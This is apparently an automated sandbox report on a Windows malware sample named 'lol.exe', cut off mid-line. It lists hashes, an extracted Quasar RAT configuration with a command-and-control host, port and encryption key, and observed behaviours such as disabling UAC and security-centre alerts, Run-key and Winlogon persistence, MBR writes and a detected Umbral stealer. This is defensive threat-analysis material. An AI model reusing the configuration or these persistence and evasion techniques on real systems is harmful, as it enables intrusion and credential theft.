Analysis
-
max time kernel
478s -
max time network
482s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-05-2024 15:35
Errors
General
-
Target
lol.exe
-
Size
13.1MB
-
MD5
621d4a616715d165ed2c10e48e5fd94b
-
SHA1
7fabfdb5167e59d0442df460e1b236cb5bc75fbe
-
SHA256
7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde
-
SHA512
793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442
-
SSDEEP
196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/files/0x000100000002aa10-4990.dat family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Program Files (x86)\\rover\\rover.exe" Rover.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" ccqytjrniv.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" ccqytjrniv.exe -
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x000100000002aa0e-2329.dat family_quasar behavioral1/memory/5604-2375-0x0000000000BA0000-0x0000000000EC4000-memory.dmp family_quasar -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" ccqytjrniv.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ccqytjrniv.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\drivers\afunix.sys Rover.exe -
Manipulates Digital Signatures 1 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
description ioc Process File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll Rover.exe -
Sets file execution options in registry 2 TTPs 16 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe\DisableExceptionChainValidation = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\DisableExceptionChainValidation = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe\DisableExceptionChainValidation = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe\MitigationOptions = "256" MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe\DisableExceptionChainValidation = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe\MitigationOptions = "256" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\MitigationOptions = "256" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe\MitigationOptions = "256" MsiExec.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/1360-39-0x00000000060D0000-0x0000000006620000-memory.dmp net_reactor behavioral1/memory/1360-43-0x0000000005B80000-0x00000000060CE000-memory.dmp net_reactor behavioral1/memory/1360-50-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-49-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-56-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-60-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-58-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-54-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-52-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-62-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-68-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-70-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-74-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-84-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-82-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-88-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-97-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-95-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-109-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-101-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-99-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-90-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-92-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-86-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-78-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-80-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-76-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-107-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-105-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-103-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-72-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-66-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-64-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-113-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor behavioral1/memory/1360-111-0x0000000005B80000-0x00000000060C9000-memory.dmp net_reactor -
Executes dropped EXE 21 IoCs
pid Process 3568 loader.exe 1360 Rover.exe 5604 scary.exe 5360 the.exe 5700 Romilyaa.exe 5900 ac3.exe 5652 jaffa.exe 796 ccqytjrniv.exe 1768 sphkjhlphydlbbz.exe 3308 oxurcpmxhhmap.exe 2784 xpxlzrjv.exe 5580 xpxlzrjv.exe 5048 packer.exe 2164 RdrServicesUpdater.exe 2320 AcroRd32.exe 5436 RdrCEF.exe 3068 RdrCEF.exe 5964 RdrCEF.exe 3912 RdrCEF.exe 744 RdrCEF.exe 5740 RdrCEF.exe -
Loads dropped DLL 64 IoCs
pid Process 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 5348 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 4944 MsiExec.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 5436 RdrCEF.exe 5436 RdrCEF.exe 5436 RdrCEF.exe 5436 RdrCEF.exe 3068 RdrCEF.exe 5964 RdrCEF.exe 3068 RdrCEF.exe 3068 RdrCEF.exe 5964 RdrCEF.exe 5964 RdrCEF.exe 3068 RdrCEF.exe 3912 RdrCEF.exe 3912 RdrCEF.exe 3912 RdrCEF.exe 3912 RdrCEF.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4240 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\InprocServer32\ThreadingModel = "Apartment" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\InprocServer32\ = "C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDFImpl64.dll" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\InprocServer32 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\InprocServer32\ = "C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF64.dll" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\InprocServer32\ThreadingModel = "Apartment" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\InprocServer32 MsiExec.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" ccqytjrniv.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hihvoizn = "ccqytjrniv.exe" sphkjhlphydlbbz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nzvjfgtz = "sphkjhlphydlbbz.exe" sphkjhlphydlbbz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "oxurcpmxhhmap.exe" sphkjhlphydlbbz.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Rover.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\m: xpxlzrjv.exe File opened (read-only) \??\t: ccqytjrniv.exe File opened (read-only) \??\v: ccqytjrniv.exe File opened (read-only) \??\m: xpxlzrjv.exe File opened (read-only) \??\o: xpxlzrjv.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\r: ccqytjrniv.exe File opened (read-only) \??\z: ccqytjrniv.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\g: xpxlzrjv.exe File opened (read-only) \??\n: xpxlzrjv.exe File opened (read-only) \??\h: ccqytjrniv.exe File opened (read-only) \??\e: xpxlzrjv.exe File opened (read-only) \??\u: xpxlzrjv.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\i: xpxlzrjv.exe File opened (read-only) \??\u: xpxlzrjv.exe File opened (read-only) \??\m: ccqytjrniv.exe File opened (read-only) \??\o: ccqytjrniv.exe File opened (read-only) \??\u: ccqytjrniv.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\p: xpxlzrjv.exe File opened (read-only) \??\h: xpxlzrjv.exe File opened (read-only) \??\n: xpxlzrjv.exe File opened (read-only) \??\y: xpxlzrjv.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\a: xpxlzrjv.exe File opened (read-only) \??\e: xpxlzrjv.exe File opened (read-only) \??\o: xpxlzrjv.exe File opened (read-only) \??\l: ccqytjrniv.exe File opened (read-only) \??\t: xpxlzrjv.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\k: xpxlzrjv.exe File opened (read-only) \??\s: xpxlzrjv.exe File opened (read-only) \??\v: xpxlzrjv.exe File opened (read-only) \??\y: ccqytjrniv.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\q: ccqytjrniv.exe File opened (read-only) \??\l: xpxlzrjv.exe File opened (read-only) \??\r: xpxlzrjv.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\w: xpxlzrjv.exe File opened (read-only) \??\i: ccqytjrniv.exe File opened (read-only) \??\g: xpxlzrjv.exe File opened (read-only) \??\p: xpxlzrjv.exe File opened (read-only) \??\v: xpxlzrjv.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\s: xpxlzrjv.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\b: xpxlzrjv.exe File opened (read-only) \??\h: xpxlzrjv.exe File opened (read-only) \??\j: xpxlzrjv.exe File opened (read-only) \??\e: ccqytjrniv.exe File opened (read-only) \??\k: ccqytjrniv.exe File opened (read-only) \??\x: ccqytjrniv.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\q: xpxlzrjv.exe File opened (read-only) \??\y: xpxlzrjv.exe File opened (read-only) \??\i: xpxlzrjv.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" ccqytjrniv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" ccqytjrniv.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Rover.exe -
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000100000002aa05-3031.dat autoit_exe behavioral1/files/0x000100000002aa07-3091.dat autoit_exe behavioral1/files/0x000700000002aa63-3096.dat autoit_exe behavioral1/files/0x000300000002aa75-3122.dat autoit_exe behavioral1/files/0x000300000002aa78-3121.dat autoit_exe behavioral1/files/0x000300000002aa64-3116.dat autoit_exe behavioral1/files/0x000100000002aab8-3161.dat autoit_exe behavioral1/files/0x000100000002aab9-3168.dat autoit_exe behavioral1/files/0x000200000002aabb-3175.dat autoit_exe behavioral1/files/0x000100000002aac6-3215.dat autoit_exe behavioral1/files/0x000100000002aac6-3222.dat autoit_exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\FileRepository\acpipmi.inf_amd64_e483b4d6fbab8545\acpipmi.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\mlx4_bus.inf_amd64_4c426f3bebc68844\ndfltr.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\iastorav.inf_amd64_87f761c07c99d5e7\iaStorAVC.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_726cea1f0f349cf7\msisadrv.sys Rover.exe File opened for modification C:\Windows\SysWOW64\msvcp100.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\Dism\OfflineSetupProvider.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-memory-l1-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\61883.inf_amd64_eb7cb6e4bc1e4d57\61883.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\halextpl080.inf_amd64_886e8913864c794c\HalExtPL080.dll Rover.exe File opened for modification C:\Windows\SysWOW64\Dism\AppxProvider.dll Rover.exe File opened for modification C:\Windows\SysWOW64\Dism\DismCorePS.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\b57nd60a.inf_amd64_77a731ab08be20a5\b57nd60a.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vca.inf_amd64_ae8fc5f4a51fab7b\vrd.sys Rover.exe File opened for modification C:\Windows\SysWOW64\Dism\ServicingCommon.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\hidbatt.inf_amd64_c9f5a9d372016276\hidbatt.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\mf.inf_amd64_2684e873d5fcdc47\mf.sys Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-service-core-l1-1-0.dll Rover.exe File created C:\Windows\System32\DriverStore\FileRepository\cpu.inf_amd64_4930e9ac235a7d97\amdppm.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\mchgr.inf_amd64_ec6b084dd265a1b9\examc.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\avc.inf_amd64_117356baf8fb8e40\avcstrm.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\iai2c.inf_amd64_a77c815b2999404d\iai2c.sys Rover.exe File opened for modification C:\Windows\SysWOW64\Speech_OneCore\Common\SpeechServiceWinRTApi.ProxyStub.dll Rover.exe File opened for modification C:\Windows\SysWOW64\setup\RasMigPlugin.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\applessd.inf_amd64_5bfb8a70c16859cf\AppleSSD.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\megasas2i.inf_amd64_f58b8f0b8ba78d73\MegaSas2i.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\netbxnda.inf_amd64_badb18141de40629\bxnd60a.sys Rover.exe File opened for modification C:\Windows\SysWOW64\migration\shmig.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-stringansi-l1-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\sti.inf_amd64_3f5e62a7baeba7dc\WSDScan.sys Rover.exe File opened for modification C:\Windows\SysWOW64\migration\commig.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\ialpssi_i2c.inf_amd64_8e00e1aed7fbdf70\iaLPSSi_I2C.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_cc6edbde0940344f\kbdhid.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_84ea762c0a90c362\pciidex.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\acxhdaudiop.inf_amd64_a72f89b4d7876048\AcxHdAudio.sys Rover.exe File opened for modification C:\Windows\SysWOW64\InstallShield\setupdir\001e\_setup.dll Rover.exe File opened for modification C:\Windows\SysWOW64\wbem\fastprox.dll Rover.exe File opened for modification C:\Windows\SysWOW64\Speech_OneCore\Common\SpeechModelDownload.exe Rover.exe File opened for modification C:\Windows\SysWOW64\Com\MigRegDB.exe Rover.exe File created C:\Windows\System32\DriverStore\FileRepository\basicdisplay.inf_amd64_a3f9d7c24b3377b3\BasicDisplay.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\helloface.inf_amd64_740102fec05a8397\facerecognitionengineadapterresourcescore.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\hpsamd.inf_amd64_0784fd3ef0d7ec93\HpSAMD.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\sdfrd.inf_amd64_23ad6a919c6adb23\SDFRd.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\microsoft_bluetooth_hfp.inf_amd64_3a78b9e0678997b7\BthHfEnum.sys Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-profile-l1-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\wgencounter.inf_amd64_475e0468b0bb4f3a\vmgencounter.sys Rover.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\powershell_ise.resources.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\netwsw00.inf_amd64_24d55504ae3587aa\Netwsw00.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\ntprint4.inf_amd64_acefa68322641a2c\Amd64\V3HostingFilter.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_amd64_144351277838b429\nvstor.sys Rover.exe File opened for modification C:\Windows\SysWOW64\migration\hwvidmigplugin.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\cpu.inf_amd64_4930e9ac235a7d97\amdk8.sys Rover.exe File opened for modification C:\Windows\SysWOW64\IME\IMEJP\imjputyc.dll Rover.exe File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_702fdf2336d2162d\hidusb.sys Rover.exe File opened for modification C:\Windows\SysWOW64\InstallShield\setupdir\0804\_setup.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-file-l1-2-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\tsprint.inf_amd64_abf4521eb250b2d1\amd64\tsprint.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\wdmaudio.inf_amd64_176f48e56eb2de15\SysFxUI.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\wnetvsc.inf_amd64_2518575b045d267b\netvsc.sys Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\API-MS-Win-core-file-l2-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_585900615f764770\usbuhci.sys Rover.exe File opened for modification C:\Windows\SysWOW64\wbem\stdprov.dll Rover.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Rover.exe File opened for modification C:\Windows\SysWOW64\msvcr100.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\Dism\CbsProvider.dll Rover.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\rover\Exit\Exit.004.png Rover.exe File created C:\Program Files (x86)\rover\_9Idle\_9Idle.002.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\s_auditreport_18.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\themes\dark\s_opencarat_18.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\scan-files\images\themeless\flags.png RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\on-boarding\images\themeless\fi_get.svg RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\rover\_4Idle\_4Idle.006.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\base_uris.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\illustrations_retina.png RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\themes\dark\svgCheckboxSelected.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\fss\img\tools\text.cur RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\rover\Come\Come.010.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_8Idle\_8Idle.001.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\on-boarding\images\themeless\pl_get.svg RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.017.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.053.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_7Idle\_7Idle.015.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\file_types\share.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\themes\dark\adobe_spinner.gif RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\themes\dark\s_ellipses_selected.svg RdrServicesUpdater.exe File created C:\Program Files 